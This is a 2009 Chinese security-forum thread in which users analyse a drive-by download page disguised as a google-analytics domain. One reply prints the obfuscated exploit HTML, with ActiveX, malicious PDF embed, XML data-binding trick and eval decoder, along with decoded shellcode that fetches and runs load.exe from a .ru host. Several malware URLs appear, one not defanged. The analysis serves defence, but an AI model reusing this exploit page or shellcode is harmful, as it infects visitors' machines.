[解密悬赏][第18期][完成]

显示全部楼层 · 发表于 2009-1-24 12:58:41

怎么都用不了。。我RP爆发了还是。。

显示全部楼层 · 发表于 2009-1-24 13:16:28

原帖由 qianwenxiang 于 2009-1-24 12:58 发表
怎么都用不了。。我RP爆发了还是。。

你RP很差吗？？？

显示全部楼层 · 发表于 2009-1-24 13:17:33

http://google-analytics.pbtgr.ru/load.php?id=61435&spl=5
只找到这个有问题.下载是个exe

显示全部楼层 · 发表于 2009-1-24 13:51:13

一直很差。。不过我坚信衰极必反。。

显示全部楼层 · 发表于 2009-1-24 15:17:49

这个操作能在虚拟机中进行.输入hxxp://google-analitycs.lijg.ru这个网址.很卡的...
然后浏览器中输入javascript: s=document.documentElement.outerHTML;document.write("<body></body>");document.body.innerText=s;
会看到以下代码.

<HTML><HEAD></HEAD>
<BODY>
<OBJECT id=xmltarget classid=CLSID:88d969c5-f192-11d4-a65f-0040963251e5></OBJECT>
<DIV id=pdfplace><EMBED src=http://google-analytics.pbtgr.ru/pdf.php?id=61435 width=150 height=150 type=application/pdf></EMBED></DIV>
<DIV id=xmlplace><XML id=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN dataFld=C dataFormatAs=HTML dataSrc=#I><IMG src="http://??.example.com/"></SPAN></DIV>
<SCRIPT>function onerrorpage(){return true;}</SCRIPT>
<STYLE>.z9A8Z1hYB{display:none;}</STYLE>
<DIV class=z9A8Z1hYB id=sfd>1e2v345a6l</DIV>
<SCRIPT>window.onerror=onerrorpage();</SCRIPT>
<B class=z9A8Z1hYB id=z9A8Z1hYB>13.10.102......(太长了不让发帖..省去了一些)....13.10</B>
<SCRIPT>var g=document.getElementById('sfd').innerHTML.replace(/[\+123456]/g,"");var extJS=eval(g);var s=document.getElementById("z9A8Z1hYB").innerHTML;s=s.replace(/[A-Za-z]/g,function (c){returnString.fromCharCode((((c=c.charCodeAt(0))&223)-52)%26+(c&32)+65);}).split(".");var p="";for(var i=0;i<s.length;i++){p+=String.fromCharCode(s);}extJS(p);</SCRIPT>
</BODY></HTML>

解密后.得到地址var shellcode=unescape("%uC033%u8B64%u3040%u0C78%u408B%u8B0C%u1C70%u8BAD%u0858%u09EB%u408B%u8D34%u7C40%u588B%u6A3C%u5A44%uE2D1%uE22B%uEC8B%u4FEB%u525A%uEA83%u8956%u0455%u5756%u738B%u8B3C%u3374%u0378%u56F3%u768B%u0320%u33F3%u49C9%u4150%u33AD%u36FF%uBE0F%u0314%uF238%u0874%uCFC1%u030D%u40FA%uEFEB%u3B58%u75F8%u5EE5%u468B%u0324%u66C3%u0C8B%u8B48%u1C56%uD303%u048B%u038A%u5FC3%u505E%u8DC3%u087D%u5257%u33B8%u8ACA%uE85B%uFFA2%uFFFF%uC032%uF78B%uAEF2%uB84F%u2E65%u7865%u66AB%u6698%uB0AB%u8A6C%u98E0%u6850%u6E6F%u642E%u7568%u6C72%u546D%u8EB8%u0E4E%uFFEC%u0455%u5093%uC033%u5050%u8B56%u0455%uC283%u837F%u31C2%u5052%u36B8%u2F1A%uFF70%u0455%u335B%u57FF%uB856%uFE98%u0E8A%u55FF%u5704%uEFB8%uE0CE%uFF60%u0455%u7468%u7074%u2F3A%u672F%u6F6F%u6C67%u2D65%u6E61%u6C61%u7479%u6369%u2E73%u6270%u6774%u2E72%u7572%u6C2F%u616F%u2E64%u6870%u3F70%u6469%u363D%u3431%u3533%u7326%u6C70%u353D");
继续得到hxxp://google-analytics.pbtgr.ru/load.php?id=61435&spl=5.下载后会得到一个名为load.exe的程序.只有几个杀毒软件报.

显示全部楼层 · 发表于 2009-1-24 15:24:19

另一个地址下载的都是这个exe
hxxp://google-analytics.pbtgr.ru/load.php?id=61435&spl=4

显示全部楼层 · 发表于 2009-1-24 15:27:12

拍爪~~~ 高人啊

显示全部楼层 · 发表于 2009-1-24 15:54:05

呵呵高手都在一楼呢.

[其它] [解密悬赏][第18期][完成]

评分

回复 22楼 taoyuan237 的帖子

回复 27楼拍黄瓜的帖子

[其它] [解密悬赏][第18期][完成]

评分

回复 22楼 taoyuan237 的帖子

回复 27楼 拍黄瓜 的帖子

回复 27楼拍黄瓜的帖子